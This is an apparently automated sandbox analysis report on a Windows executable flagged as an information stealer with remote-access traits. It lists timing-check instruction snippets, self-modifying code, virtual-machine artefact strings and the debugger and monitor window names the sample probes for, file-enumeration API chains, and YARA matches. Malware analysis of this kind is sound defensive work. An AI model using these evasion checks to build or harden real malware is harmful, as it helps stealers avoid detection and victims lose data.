                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C8AE second address: E0C8B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24016 second address: E2401C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24170 second address: E24187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28A75 second address: E28A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37456 second address: E3745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37293 second address: E37297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37297 second address: E372C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ah 0x00000007 jno 00007F0F7085C598h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jc 00007F0F7085C596h 0x00000017 jmp 00007F0F7085C59Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD76 second address: E3DD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD80 second address: E3DD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD84 second address: E3DDA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F70ECA9ADh 0x0000000b popad 0x0000000c pushad 0x0000000d jng 00007F0F70ECA9B2h 0x00000013 jbe 00007F0F70ECA9A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DDA7 second address: E3DDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0F7085C5A4h 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F0F7085C596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C71D second address: E3C737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C737 second address: E3C73C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CB30 second address: E3CB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CB34 second address: E3CB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3D0F0 second address: E3D0FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F70ECA9ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DA98 second address: E3DAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0F7085C596h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42016 second address: E42022 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F70ECA9A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C10 second address: E47C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F7085C59Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C29 second address: E47C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E47C2E second address: E47C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E47A86 second address: E47A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E47A8C second address: E47ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jc 00007F0F7085C5D5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0F7085C5A3h 0x0000001d jmp 00007F0F7085C5A4h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E53AE3 second address: E53AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E60808 second address: E6080E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E6080E second address: E6083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0F70ECA9CBh 0x0000000c jmp 00007F0F70ECA9B9h 0x00000011 jmp 00007F0F70ECA9ACh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E609DB second address: E609E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E708BF second address: E708E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F0F70ECA9BFh 0x0000000f jmp 00007F0F70ECA9B9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E708E7 second address: E708EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E708EF second address: E708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E708F3 second address: E708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E70A26 second address: E70A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E70B7A second address: E70B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E70B80 second address: E70B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E70B86 second address: E70B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F7085C596h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E713F2 second address: E71442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 jmp 00007F0F70ECA9AFh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F70ECA9B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0F70ECA9AFh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E71442 second address: E71448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E71448 second address: E71458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0F70ECA9A6h 0x0000000a jo 00007F0F70ECA9A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E71458 second address: E7145C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E74115 second address: E74133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9B4h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E741EB second address: E74206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E74444 second address: E744E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0F70ECA9BBh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F0F70ECA9AEh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0F70ECA9A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2B43h] 0x00000033 push 00000004h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F0F70ECA9A8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jc 00007F0F70ECA9ACh 0x00000055 mov edx, dword ptr [ebp+12467678h] 0x0000005b push BD9BF3A5h 0x00000060 pushad 0x00000061 jng 00007F0F70ECA9ACh 0x00000067 ja 00007F0F70ECA9A6h 0x0000006d push eax 0x0000006e push edx 0x0000006f push edi 0x00000070 pop edi 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E76FD3 second address: E76FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E76FD7 second address: E76FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E76FDF second address: E76FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E76FE3 second address: E76FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E76FFC second address: E7702A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F7085C59Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E7702A second address: E7702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E7702E second address: E77056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0F7085C5A0h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E77056 second address: E77069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9ADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E77069 second address: E7706D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E7706D second address: E7707B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0F70ECA9ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561033C second address: 5610355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F7085C5A5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5610355 second address: 561037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F70ECA9ADh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561037C second address: 5610397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov di, 796Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F7085C59Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5610397 second address: 56103BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F70ECA9AFh 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, 8B83h 0x00000016 mov edi, eax 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 56103BA second address: 56103E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007F0F7085C5A7h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, BEB7h 0x00000017 mov di, si 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5610465 second address: 5610469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5610469 second address: 561046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561046D second address: 5610473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5610473 second address: 5610479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D98275 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DBE9E6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C01B1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C06CF6 rdtsc 0_2_00C06CF6
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009B38B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009B4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_009ADA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_009AE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_009AED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_009B4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009AF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_009B3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009A16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009ADE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_009ABE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A1160 GetSystemInfo,ExitProcess, 0_2_009A1160
                Source: file.exe, file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1771889897.0000000001643000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT
                Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1771889897.0000000001643000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13513
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13510
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13529
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13525
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13564
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C06CF6 rdtsc 0_2_00C06CF6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_009A45C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_009B9860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9750 mov eax, dword ptr fs:[00000030h] 0_2_009B9750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_009B78E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_009B9600
                Source: file.exe, file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: RProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_009B7B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_009B7980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_009B7850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_009B7A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.9a0000.0.unpack, type: UNPACKEDPE
